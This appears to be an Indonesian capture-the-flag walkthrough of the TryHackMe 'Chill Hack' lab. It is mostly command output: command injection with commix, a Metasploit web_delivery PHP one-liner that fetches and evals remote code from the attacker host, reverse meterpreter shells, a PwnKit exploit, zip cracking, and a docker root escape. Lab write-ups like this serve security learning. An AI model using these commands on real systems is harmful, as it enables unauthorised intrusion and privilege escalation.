Chill Hack TryHackme
Introduction
10 min readDec 1, 2022
Hai kembali lagi dengan saya :D di tulisan kali ini saya akan mencoba menyelesaikan kotak ruang tryhackme lagi. start kotaknya dan ayo memulai untuk menyelesaikannya..
Enumerasi
memulai dengan pemindaian port layanan terbuka
woonz@localhost /home/woonz/Public/chillhack
⚡ cat nmap.txt
# Nmap 7.93 scan initiated Mon Nov 28 13:28:35 2022 as: nmap -sC -sV -oN nmap.txt 10.10.254.77
Nmap scan report for 10.10.254.77
Host is up (0.34s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.18.3.26
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1001 1001 90 Oct 03 2020 note.txt
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09f95db918d0b23a822d6e768cc20144 (RSA)
| 256 1bcf3a498b1b20b02c6aa551a88f1e62 (ECDSA)
|_ 256 3005cc52c66f6504860f7241c8a439cf (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Game Info
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 28 13:35:04 2022 -- 1 IP address (1 host up) scanned in 389.32 secondsada 3 port yan terbuka 21,22,80 nampaknya kita bisa masuk ke ftp dan mengambil note.txt.
woonz@localhost /home/woonz/Public/chillhack
⚡ ftp 10.10.254.77
Connected to 10.10.254.77.
220 (vsFTPd 3.0.3)
Name (10.10.254.77:woonz): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||47016|)
150 Here comes the directory listing.
-rw-r--r-- 1 1001 1001 90 Oct 03 2020 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||25242|)
150 Opening BINARY mode data connection for note.txt (90 bytes).
100% |****************************************************************************************************************| 90 906.08 KiB/s 00:00 ETA
226 Transfer complete.
90 bytes received in 00:00 (0.28 KiB/s)
ftp> exit
221 Goodbye.
woonz@localhost /home/woonz/Public/chillhack
⚡ cat note.txt
Anurodh told me that there is some filtering on strings being put in the command -- Apaarhmm menarik ada yang di sembunyikan mari kita coba temukan di mana letak url itu. jelajahi port 80 untuk mencari informasi lebih lanjut.
tidak ada yang menarik hnya halaman biasa. lanjut kita akan mencoba pemaksaan directory menggunakan Gobuster.
woonz@localhost /home/woonz/Public/chillhack
⚡ gobuster dir -u http://10.10.254.77/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.254.77/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/28 13:48:17 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 313] [--> http://10.10.254.77/images/]
/css (Status: 301) [Size: 310] [--> http://10.10.254.77/css/]
/js (Status: 301) [Size: 309] [--> http://10.10.254.77/js/]
/fonts (Status: 301) [Size: 312] [--> http://10.10.254.77/fonts/]
/secret (Status: 301) [Size: 313] [--> http://10.10.254.77/secret/]folder secret terlihat mari mengarah ke sana..
hmm ini adalah injeksi perintah. persis seperti clue note.txt ini di filtering sehingga beberapa perintah tidak bisa di eksekusi misal ifconfig itu lolos dan contoh lagi cat /etc/passwd itu tidak lolos, maka akan tampil seperti di bawah.
tenang kita akan menggunakan alat yang sangat kuat yaitu commix untuk meghandle injeksi perintah yang di filtering..
woonz@localhost /home/woonz/Public/chillhack
⚡ commix -u http://10.10.254.77/secret/ --data="command=id"
__
___ ___ ___ ___ ___ ___ /\_\ __ _
/`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\ v3.5-stable
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/> </
\ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\ https://commixproject.com
\/____/\/___/ \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ (@commixproject)
+--
Automated All-in-One OS Command Injection Exploitation Tool
Copyright © 2014-2022 Anastasios Stasinopoulos (@ancst)
+--
(!) Legal disclaimer: Usage of commix for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
[14:24:32] [info] Testing connection to the target URL.
[14:24:35] [info] Performing identification checks to the target URL.
[14:24:36] [info] Setting POST parameter 'command' for tests.
[14:24:38] [info] Heuristic (basic) tests shows that POST parameter 'command' might be injectable (possible OS: 'Unix-like').
A previously stored session has been held against that target. Do you want to resume to (results-based) classe to (results-based) classic command injection point? [Y/n] > Y
[14:24:41] [info] POST parameter 'command' appears to be injectable via (results-based) classic command injection technique.
|_ id;echo GAQAAL$((67+65))$(echo GAQAAL)GAQAAL
POST parameter 'command' is vulnerable. Do you want to prompt for a pseudo-terminal shell? [Y/n] > Y
Pseudo-Terminal Shell (type '?' for available options)
commix(os_shell) > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin aurick:x:1000:1000:Anurodh:/home/aurick:/bin/bash mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false apaar:x:1001:1001:,,,:/home/apaar:/bin/bash anurodh:x:1002:1002:,,,:/home/anurodh:/bin/bash ftp:x:112:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
commix(os_shell) >yaps akhirnya kita mendapatkan os perintah sewenang wenang :D
lanjut di sini saya akan bermigrasi ke payload yang lebih baik. di sini kita akan menggunakan metasploit dengan module web_delivery yang sangat kuat untuk menghantarkan payload ..
msf6 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 7.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 10.18.3.26:4444
[*] Using URL: http://10.18.3.26:8080/mxzrCkWp3WF
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://10.18.3.26:8080/mxzrCkWp3WF', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"tempel payload di bawah yang di hasilkan oleh web_delivery ke os-shell yang di hasilkan oleh commix tersebur dan hasilkan sesi meterpreter dengan cepat..
php -d allow_url_fopen=true -r "eval(file_get_contents('http://10.18.3.26:8080/mxzrCkWp3WF', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"msf6 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 7.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 10.18.3.26:4444
[*] Using URL: http://10.18.3.26:8080/mxzrCkWp3WF
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://10.18.3.26:8080/mxzrCkWp3WF', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
[*] 10.10.254.77 web_delivery - Delivering Payload (1111 bytes)
[*] Sending stage (39927 bytes) to 10.10.254.77
[*] Meterpreter session 2 opened (10.18.3.26:4444 -> 10.10.254.77:55342) at 2022-11-28 14:26:04 -0500
msf6 exploit(multi/script/web_delivery)kita sudah merubah shell ke yang lebih baik..
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 meterpreter php/linux www-data @ ubuntu 10.18.3.26:4444 -> 10.10.254.77:55346 (10.10.254.77)
msf6 exploit(multi/script/web_delivery) >ketika saya masuk sebagai pengguna www-data dan mencoba menjalanlan alat enumers linpeas dan menemukan hal menarik…
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(apaar : ALL) NOPASSWD: /home/apaar/.helpline.shkita bisa menjalankan file .helpline.sh dengan hak istimewa appar.
meterpreter > shell
Process 2110 created.
Channel 3 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
ww-data@ubuntu:/tmp$ sudo -u apaar /home/apaar/.helpline.sh
sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time!
Enter the person whom you want to talk with: loli
loli
Hello user! I am loli, Please enter your message: /tmp/shell.elf
/tmp/shell.elfdi atas saya menjalankan file payload yang saya buat menggunakan msfvenom di bagian message dan alhasil saya mengeksekusi payload dengan pengguna appar dan mendapatkan sesi meterpreter
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.18.3.26:5555
[*] Meterpreter session 3 opened (10.18.3.26:5555 -> 10.10.254.77:34054) at 2022-11-28 14:51:21 -0500
meterpreter > getuid
Server username: apaar
meterpreter >meterpreter > shell
Process 2110 created.
Channel 3 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
apaar@ubuntu:~$ ls -la
ls -la
total 44
drwxr-xr-x 5 apaar apaar 4096 Oct 4 2020 .
drwxr-xr-x 5 root root 4096 Oct 3 2020 ..
-rw------- 1 apaar apaar 0 Oct 4 2020 .bash_history
-rw-r--r-- 1 apaar apaar 220 Oct 3 2020 .bash_logout
-rw-r--r-- 1 apaar apaar 3771 Oct 3 2020 .bashrc
drwx------ 2 apaar apaar 4096 Oct 3 2020 .cache
drwx------ 3 apaar apaar 4096 Oct 3 2020 .gnupg
-rwxrwxr-x 1 apaar apaar 286 Oct 4 2020 .helpline.sh
-rw-r--r-- 1 apaar apaar 807 Oct 3 2020 .profile
drwxr-xr-x 2 apaar apaar 4096 Oct 3 2020 .ssh
-rw------- 1 apaar apaar 817 Oct 3 2020 .viminfo
-rw-rw---- 1 apaar apaar 46 Oct 4 2020 local.txt
apaar@ubuntu:~$ cat .local.txt
cat .local.txt
cat: .local.txt: No such file or directory
apaar@ubuntu:~$ cat local.txt
cat local.txt
{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}
apaar@ubuntu:~$flag pertama di temukan. selanjutnya mari kita tingkatkan hak istimewa kita ke yang lebih tinggi lagi..
di sini saya akan mencoba menemukan exploitasi lokal dengan module metasploit exploit suggester dan menemukan beberapa kerentanan lokal
msf6 post(multi/recon/local_exploit_suggester) > exploit
[*] 10.10.254.77 - Collecting local exploits for x86/linux...
[*] 10.10.254.77 - 174 exploit checks are being tried...
[+] 10.10.254.77 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 10.10.254.77 - exploit/linux/local/nested_namespace_idmap_limit_priv_esc: The target appears to be vulnerable.
[+] 10.10.254.77 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 10.10.254.77 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 10.10.254.77 - exploit/linux/local/ubuntu_enlightenment_mount_priv_esc: The target appears to be vulnerable.
[*] Running check method for exploit 52 / 52
[*] 10.10.254.77 - Valid modules for session 3:saya akan mencoba exploit pwnkit
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > exploit
[*] Started reverse TCP handler on 10.18.3.26:7667
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.ndtqumkf
[+] The target is vulnerable.
[*] Writing '/tmp/.tkecjwbrzgam/ngzkeuvckae/ngzkeuvckae.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.tkecjwbrzgam
[*] Sending stage (3045348 bytes) to 10.10.254.77
[*] Meterpreter session 4 opened (10.18.3.26:7667 -> 10.10.254.77:43094) at 2022-11-28 15:06:12 -0500
meterpreter > getuid
Server username: rootdan kita berhasil mendapatkan shell root. dan yaa saya rasa ini terlalu cepat.
di sini saya menemukan 2 directory di folder /var/www/data saya rasa itu adalah website yang berbeda yang di host secara localhost.
mari kita akses dengan membuka gerbang ssh untuk meneruskan port.
woonz@localhost /home/woonz/Public/chillhack
⚡ ssh -L 9001:127.0.0.1:9001 -i id_rsa apaar@10.10.182.37
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-118-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Dec 1 19:21:56 UTC 2022
System load: 0.0 Processes: 124
Usage of /: 24.8% of 18.57GB Users logged in: 0
Memory usage: 21% IP address for eth0: 10.10.182.37
Swap usage: 0% IP address for docker0: 172.17.0.1
=> There are 2 zombie processes.
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
19 packages can be updated.
0 updates are security updates.
Last login: Sun Oct 4 14:05:57 2020 from 192.168.184.129
apaar@ubuntu:~$terhubung mari kita buka web_browser kita dan nafigasi ip ke localhost:9001 port yang kita buka tadi..
di sini dia menampilkan halaman login. mari kita uji dengan tehnik sql bypass login di sini saya mengambil muatan di github dan melakukan pemaksaan dan menganalisa respon yang berbeda menggunakan alat seperti burp..
menemukan lenght yang berbeda dari payload lainnya. dan mari kita uji..
berhasil masuk..dari clue yang di berikan cukup jelas..mari kita unduh gambar hacker yang sedang memegang leptop. dan melakukan sedikit analais menggunakan steghide.
woonz@localhost /home/woonz/Public/chillhack
⚡ steghide info hacker-with-laptop_23-2147985341.jpg
"hacker-with-laptop_23-2147985341.jpg":
format: jpeg
capacity: 3.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "backup.zip":
size: 750.0 Byte
encrypted: rijndael-128, cbc
compressed: yeswow ternyata ada sebuah folder zip tersimpan did dalam gambar. mari kita keluarkan file zip tersebut.
⚡ steghide extract -sf hacker-with-laptop_23-2147985341.jpg
Enter passphrase:
the file "backup.zip" does already exist. overwrite ? (y/n) y
wrote extracted data to "backup.zip".woonz@localhost /home/woonz/Public/chillhack
⚡ unzip backup.zip
Archive: backup.zip
[backup.zip] source_code.php password:sayangnya tidak begitu mudah itu menggunakan password. mari kita coba pecahkan dengan john-the-ripper
woonz@localhost /home/woonz/Public/chillhack
⚡ zip2john backup.zip > hash.backup
ver 2.0 efh 5455 efh 7875 backup.zip/source_code.php PKZIP Encr: TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3 ts=2297 cs=2297 type=8
woonz@localhost /home/woonz/Public/chillhack
⚡ john hash.backup --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
No password hashes left to crack (see FAQ)
woonz@localhost /home/woonz/Public/chillhack
⚡ john hash.backup --show
backup.zip/source_code.php:pass1word:source_code.php:backup.zip::backup.zip
1 password hash cracked, 0 leftyaps terpecahkan. mengextrack file zip dan membaca sourcode_php ada satu line yang disandingkan base64 mari kita coba decrypt
<?php
if(isset($_POST['submit']))
{
$email = $_POST["email"];
$password = $_POST["password"];
if(base64_encode($password) == "IWQwb****bVlwQHNzdzByZA==")woonz@localhost /home/woonz/Public/chillhack
⚡ echo IWQwbnRLbjB3b*****NzdzByZA== | base64 -d
!d0ntKn***p@ssw0rd%dengan sandi tersebut kita berhasil masuk ke arodh user.
apaar@ubuntu:/home$ ls
anurodh apaar aurick
apaar@ubuntu:/home$ su anurodh
Password:
anurodh@ubuntu:/home$ id
uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker)
anurodh@ubuntu:/home$ docker terlihat dan kita memiliki izin grub melakukan pencarian docker untuk GTFobins
anurodh@ubuntu:/home$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
id
id
# uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# whoami
root
# dan kita berhasil mendapatkan root :D
sekian tulisan dari saya, sampai jumpa di tulisan berikutnya :DDD
